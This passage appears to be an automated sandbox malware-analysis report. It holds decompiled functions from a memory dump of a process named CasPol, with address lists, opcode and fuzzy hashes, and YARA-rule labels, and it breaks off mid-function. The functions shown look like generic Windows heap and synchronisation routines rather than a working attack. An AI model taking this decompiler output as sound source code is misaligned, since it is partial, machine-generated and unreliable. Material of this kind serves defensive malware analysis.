                                                                                                                                                                                                                                                                                                0x017837a7
                                                                                                                                                                                                                                                                                                0x017837ad
                                                                                                                                                                                                                                                                                                0x017837b0
                                                                                                                                                                                                                                                                                                0x017837b2
                                                                                                                                                                                                                                                                                                0x017837bc
                                                                                                                                                                                                                                                                                                0x017837c2
                                                                                                                                                                                                                                                                                                0x017837c2
                                                                                                                                                                                                                                                                                                0x017837b2
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0172918a
                                                                                                                                                                                                                                                                                                0x0172918d
                                                                                                                                                                                                                                                                                                0x0172918f
                                                                                                                                                                                                                                                                                                0x01729192
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729195
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376a
                                                                                                                                                                                                                                                                                                0x0178376c
                                                                                                                                                                                                                                                                                                0x0178376c
                                                                                                                                                                                                                                                                                                0x0178376f
                                                                                                                                                                                                                                                                                                0x01783775
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783777
                                                                                                                                                                                                                                                                                                0x01783779
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01783782
                                                                                                                                                                                                                                                                                                0x01783787
                                                                                                                                                                                                                                                                                                0x01783789
                                                                                                                                                                                                                                                                                                0x01783790
                                                                                                                                                                                                                                                                                                0x01783790
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x0178378b
                                                                                                                                                                                                                                                                                                0x01783792
                                                                                                                                                                                                                                                                                                0x01783795
                                                                                                                                                                                                                                                                                                0x01783795
                                                                                                                                                                                                                                                                                                0x01783798
                                                                                                                                                                                                                                                                                                0x01783798
                                                                                                                                                                                                                                                                                                0x0178379b
                                                                                                                                                                                                                                                                                                0x0178379b
                                                                                                                                                                                                                                                                                                0x017291a3
                                                                                                                                                                                                                                                                                                0x017291a9
                                                                                                                                                                                                                                                                                                0x017291b0
                                                                                                                                                                                                                                                                                                0x017291b4
                                                                                                                                                                                                                                                                                                0x017291b4
                                                                                                                                                                                                                                                                                                0x017291bb
                                                                                                                                                                                                                                                                                                0x017291c0
                                                                                                                                                                                                                                                                                                0x017291c5
                                                                                                                                                                                                                                                                                                0x017291c7
                                                                                                                                                                                                                                                                                                0x017837da
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291cd
                                                                                                                                                                                                                                                                                                0x017291d2
                                                                                                                                                                                                                                                                                                0x017291d5
                                                                                                                                                                                                                                                                                                0x01729239
                                                                                                                                                                                                                                                                                                0x01729239
                                                                                                                                                                                                                                                                                                0x017291d7
                                                                                                                                                                                                                                                                                                0x017291db
                                                                                                                                                                                                                                                                                                0x017291e1
                                                                                                                                                                                                                                                                                                0x017291e7
                                                                                                                                                                                                                                                                                                0x017291fd
                                                                                                                                                                                                                                                                                                0x01729203
                                                                                                                                                                                                                                                                                                0x0172921e
                                                                                                                                                                                                                                                                                                0x01729223
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01729223
                                                                                                                                                                                                                                                                                                0x01729205
                                                                                                                                                                                                                                                                                                0x01729208
                                                                                                                                                                                                                                                                                                0x0172920c
                                                                                                                                                                                                                                                                                                0x01729214
                                                                                                                                                                                                                                                                                                0x01729214
                                                                                                                                                                                                                                                                                                0x017291e9
                                                                                                                                                                                                                                                                                                0x017291e9
                                                                                                                                                                                                                                                                                                0x017291ee
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291f3
                                                                                                                                                                                                                                                                                                0x017291e7
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017291db
                                                                                                                                                                                                                                                                                                0x01729187
                                                                                                                                                                                                                                                                                                0x01729168

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7773403be8bceaef5f594f0ee73e0a6fa50854e75d95bc018e69291987b0b369
                                                                                                                                                                                                                                                                                                • Instruction ID: 196074d070416d58709f687636b611383bf0d599c4088f49b000563d6605e3f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7773403be8bceaef5f594f0ee73e0a6fa50854e75d95bc018e69291987b0b369
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0731CF71A002A5DFEB26EB6DC48CBADFBF1BB59318F2C814DC60467245C330A981CB52
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01740050 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                			E01740050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x181d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				L01759ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return L0176B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E017F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = L01759702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x181b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                                                                                                                                                                                                                                                0x01740055
                                                                                                                                                                                                                                                                                                0x0174005d
                                                                                                                                                                                                                                                                                                0x01740062
                                                                                                                                                                                                                                                                                                0x0174006c
                                                                                                                                                                                                                                                                                                0x0174006f
                                                                                                                                                                                                                                                                                                0x01740074
                                                                                                                                                                                                                                                                                                0x0174007a
                                                                                                                                                                                                                                                                                                0x0174007a
                                                                                                                                                                                                                                                                                                0x01740080
                                                                                                                                                                                                                                                                                                0x01740080
                                                                                                                                                                                                                                                                                                0x01740087
                                                                                                                                                                                                                                                                                                0x0174008d
                                                                                                                                                                                                                                                                                                0x0174008f
                                                                                                                                                                                                                                                                                                0x01740093
                                                                                                                                                                                                                                                                                                0x01740095
                                                                                                                                                                                                                                                                                                0x0174009b
                                                                                                                                                                                                                                                                                                0x017400f8
                                                                                                                                                                                                                                                                                                0x017400fb
                                                                                                                                                                                                                                                                                                0x017400fc
                                                                                                                                                                                                                                                                                                0x017400ff
                                                                                                                                                                                                                                                                                                0x01740108
                                                                                                                                                                                                                                                                                                0x01740108
                                                                                                                                                                                                                                                                                                0x017400a2
                                                                                                                                                                                                                                                                                                0x017400a6
                                                                                                                                                                                                                                                                                                0x017400b3
                                                                                                                                                                                                                                                                                                0x017400bc
                                                                                                                                                                                                                                                                                                0x017400c5
                                                                                                                                                                                                                                                                                                0x017400ca
                                                                                                                                                                                                                                                                                                0x0178c01e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0178c02d
                                                                                                                                                                                                                                                                                                0x017400d5
                                                                                                                                                                                                                                                                                                0x017400d9
                                                                                                                                                                                                                                                                                                0x0178c03d
                                                                                                                                                                                                                                                                                                0x0178c046
                                                                                                                                                                                                                                                                                                0x0178c046
                                                                                                                                                                                                                                                                                                0x017400df
                                                                                                                                                                                                                                                                                                0x017400e2
                                                                                                                                                                                                                                                                                                0x017400ea
                                                                                                                                                                                                                                                                                                0x017400ef
                                                                                                                                                                                                                                                                                                0x017400f2
                                                                                                                                                                                                                                                                                                0x017400f6
                                                                                                                                                                                                                                                                                                0x01740111
                                                                                                                                                                                                                                                                                                0x01740117
                                                                                                                                                                                                                                                                                                0x01740117
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017400f6
                                                                                                                                                                                                                                                                                                0x017400d0
                                                                                                                                                                                                                                                                                                0x017400d0
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 66c7c54b4274d61f9f1047deb2565639f0b521973f691d0e220751e85c42f58b
                                                                                                                                                                                                                                                                                                • Instruction ID: d1b786680196d9776d841552ca93e0959514855789176ff83fe10b008eac12b6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66c7c54b4274d61f9f1047deb2565639f0b521973f691d0e220751e85c42f58b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0318D31201B04CFD722CF28C844B9AF7E5FF89714F14456DEAA687BA0EB75A901CB90
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017690AF Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                                			E017690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(L0177D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(L0175E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01744620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0176F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0175A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                                                                                                                                                                                                                                                0x017690af
                                                                                                                                                                                                                                                                                                0x017690b8
                                                                                                                                                                                                                                                                                                0x017690bb
                                                                                                                                                                                                                                                                                                0x017690bf
                                                                                                                                                                                                                                                                                                0x017690c2
                                                                                                                                                                                                                                                                                                0x017690c2
                                                                                                                                                                                                                                                                                                0x017690c8
                                                                                                                                                                                                                                                                                                0x017690cb
                                                                                                                                                                                                                                                                                                0x017690cd
                                                                                                                                                                                                                                                                                                0x017a14d7
                                                                                                                                                                                                                                                                                                0x017a14eb
                                                                                                                                                                                                                                                                                                0x017a14eb
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a14eb
                                                                                                                                                                                                                                                                                                0x017a14db
                                                                                                                                                                                                                                                                                                0x017a14e6
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a14f2
                                                                                                                                                                                                                                                                                                0x017a14e8
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017a14e8
                                                                                                                                                                                                                                                                                                0x017690d8
                                                                                                                                                                                                                                                                                                0x017690da
                                                                                                                                                                                                                                                                                                0x017690dd
                                                                                                                                                                                                                                                                                                0x017690e5
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01769139
                                                                                                                                                                                                                                                                                                0x017690fa
                                                                                                                                                                                                                                                                                                0x017690fe
                                                                                                                                                                                                                                                                                                0x01769142
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01769142
                                                                                                                                                                                                                                                                                                0x01769104
                                                                                                                                                                                                                                                                                                0x01769107
                                                                                                                                                                                                                                                                                                0x0176910b
                                                                                                                                                                                                                                                                                                0x01769110
                                                                                                                                                                                                                                                                                                0x01769118
                                                                                                                                                                                                                                                                                                0x01769147
                                                                                                                                                                                                                                                                                                0x01769148
                                                                                                                                                                                                                                                                                                0x0176914f
                                                                                                                                                                                                                                                                                                0x01769150
                                                                                                                                                                                                                                                                                                0x01769151
                                                                                                                                                                                                                                                                                                0x01769152
                                                                                                                                                                                                                                                                                                0x01769156
                                                                                                                                                                                                                                                                                                0x0176915d
                                                                                                                                                                                                                                                                                                0x01769160
                                                                                                                                                                                                                                                                                                0x01769168
                                                                                                                                                                                                                                                                                                0x0176916c
                                                                                                                                                                                                                                                                                                0x017691bc
                                                                                                                                                                                                                                                                                                0x017691be
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017691be
                                                                                                                                                                                                                                                                                                0x0176916e
                                                                                                                                                                                                                                                                                                0x01769173
                                                                                                                                                                                                                                                                                                0x01769176
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0176917c
                                                                                                                                                                                                                                                                                                0x01769180
                                                                                                                                                                                                                                                                                                0x017691b5
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017691b5
                                                                                                                                                                                                                                                                                                0x01769182
                                                                                                                                                                                                                                                                                                0x01769185
                                                                                                                                                                                                                                                                                                0x01769189
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0176918e
                                                                                                                                                                                                                                                                                                0x01769190
                                                                                                                                                                                                                                                                                                0x01769198
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017691a0
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017691ad
                                                                                                                                                                                                                                                                                                0x017691ad
                                                                                                                                                                                                                                                                                                0x017691b0
                                                                                                                                                                                                                                                                                                0x017691b1
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01769185
                                                                                                                                                                                                                                                                                                0x0176911a
                                                                                                                                                                                                                                                                                                0x0176911c
                                                                                                                                                                                                                                                                                                0x0176911f
                                                                                                                                                                                                                                                                                                0x01769125
                                                                                                                                                                                                                                                                                                0x01769127
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                                                                                                                                                                                • Instruction ID: f841151062a43f2d70b0b423240ced7042a294ed31ecba1e3057d9f0eadf2431
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0218071A00205EFDB21DF59C844AAAFBFCEF54714F1488AAEA45A7200D730ED04CB90
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01753B7A Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                                                                                                                                                                			E01753B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x18184c4; // 0x0
				_v12 = 1;
				_v8 =  *0x18184c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01744620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18184c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0176AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0176FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18184c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x18184c4; // 0x0
					L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                                                                                                                                                                                                                                                                                0x01753b89
                                                                                                                                                                                                                                                                                                0x01753b96
                                                                                                                                                                                                                                                                                                0x01753ba1
                                                                                                                                                                                                                                                                                                0x01753bab
                                                                                                                                                                                                                                                                                                0x01753bb5
                                                                                                                                                                                                                                                                                                0x01753bb9
                                                                                                                                                                                                                                                                                                0x01796298
                                                                                                                                                                                                                                                                                                0x01753bbf
                                                                                                                                                                                                                                                                                                0x01753bc2
                                                                                                                                                                                                                                                                                                0x01753bc3
                                                                                                                                                                                                                                                                                                0x01753bc9
                                                                                                                                                                                                                                                                                                0x01753bca
                                                                                                                                                                                                                                                                                                0x01753bcc
                                                                                                                                                                                                                                                                                                0x01753bcd
                                                                                                                                                                                                                                                                                                0x01753bd4
                                                                                                                                                                                                                                                                                                0x01753bd6
                                                                                                                                                                                                                                                                                                0x01753bdb
                                                                                                                                                                                                                                                                                                0x01753bea
                                                                                                                                                                                                                                                                                                0x01753bf7
                                                                                                                                                                                                                                                                                                0x01753bfb
                                                                                                                                                                                                                                                                                                0x01753bff
                                                                                                                                                                                                                                                                                                0x01753c09
                                                                                                                                                                                                                                                                                                0x01753c0a
                                                                                                                                                                                                                                                                                                0x01753c0b
                                                                                                                                                                                                                                                                                                0x01753c0f
                                                                                                                                                                                                                                                                                                0x01753c14
                                                                                                                                                                                                                                                                                                0x01753c18
                                                                                                                                                                                                                                                                                                0x01753c18
                                                                                                                                                                                                                                                                                                0x01753bfb
                                                                                                                                                                                                                                                                                                0x01753c1b
                                                                                                                                                                                                                                                                                                0x01753c30
                                                                                                                                                                                                                                                                                                0x01753c30
                                                                                                                                                                                                                                                                                                0x01753c3d

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6fdce755023df357802fbe044d53e757b1c4572dc79906472c77a9eedec118fa
                                                                                                                                                                                                                                                                                                • Instruction ID: 7acfdf19f4b641586f978b7f54ddef2e57929f0541fd0fc8b0d29ff88cbe0426
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fdce755023df357802fbe044d53e757b1c4572dc79906472c77a9eedec118fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9219F72A00109AFC715DF58DD81F5AFBBDFB45748F1500A8EA09AB251D771EE01DB90
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0175B390 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 54%
                                                                                                                                                                                                                                                                                                			E0175B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01742280(_t12, 0x1818608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E017600C2(0x1818608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                                                                                                                                                                                                                0x0175b395
                                                                                                                                                                                                                                                                                                0x0175b3a2
                                                                                                                                                                                                                                                                                                0x0175b3a5
                                                                                                                                                                                                                                                                                                0x0175b3aa
                                                                                                                                                                                                                                                                                                0x0175b3b2
                                                                                                                                                                                                                                                                                                0x0175b3ba
                                                                                                                                                                                                                                                                                                0x0175b3bd
                                                                                                                                                                                                                                                                                                0x0175b3c0
                                                                                                                                                                                                                                                                                                0x0175b3c4
                                                                                                                                                                                                                                                                                                0x0175b3c9
                                                                                                                                                                                                                                                                                                0x0179a3e9
                                                                                                                                                                                                                                                                                                0x0179a3ed
                                                                                                                                                                                                                                                                                                0x0179a3f0
                                                                                                                                                                                                                                                                                                0x0179a3ff
                                                                                                                                                                                                                                                                                                0x0179a403
                                                                                                                                                                                                                                                                                                0x0179a409
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x0179a40b
                                                                                                                                                                                                                                                                                                0x0179a40b
                                                                                                                                                                                                                                                                                                0x0179a40f
                                                                                                                                                                                                                                                                                                0x0179a415
                                                                                                                                                                                                                                                                                                0x0179a423
                                                                                                                                                                                                                                                                                                0x0179a423
                                                                                                                                                                                                                                                                                                0x0179a415
                                                                                                                                                                                                                                                                                                0x0175b3d1
                                                                                                                                                                                                                                                                                                0x0175b3e8
                                                                                                                                                                                                                                                                                                0x0175b3e8
                                                                                                                                                                                                                                                                                                0x0175b3d9

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 59e40bf2916d914b90ca7b08f1e27132bf9d661a06d4fa7b4e28442a6f076857
                                                                                                                                                                                                                                                                                                • Instruction ID: 2252f86ce0242fbf755ca16ac2f976fe110e5ab22322c76f0f2f35eb9109947f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59e40bf2916d914b90ca7b08f1e27132bf9d661a06d4fa7b4e28442a6f076857
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F81166333061109FCB29CA189D81A3BF26BEBD6370F290139EE16D7391CA71AC06C690
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01729240 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                                                                			E01729240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x17ff708);
				E0177D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
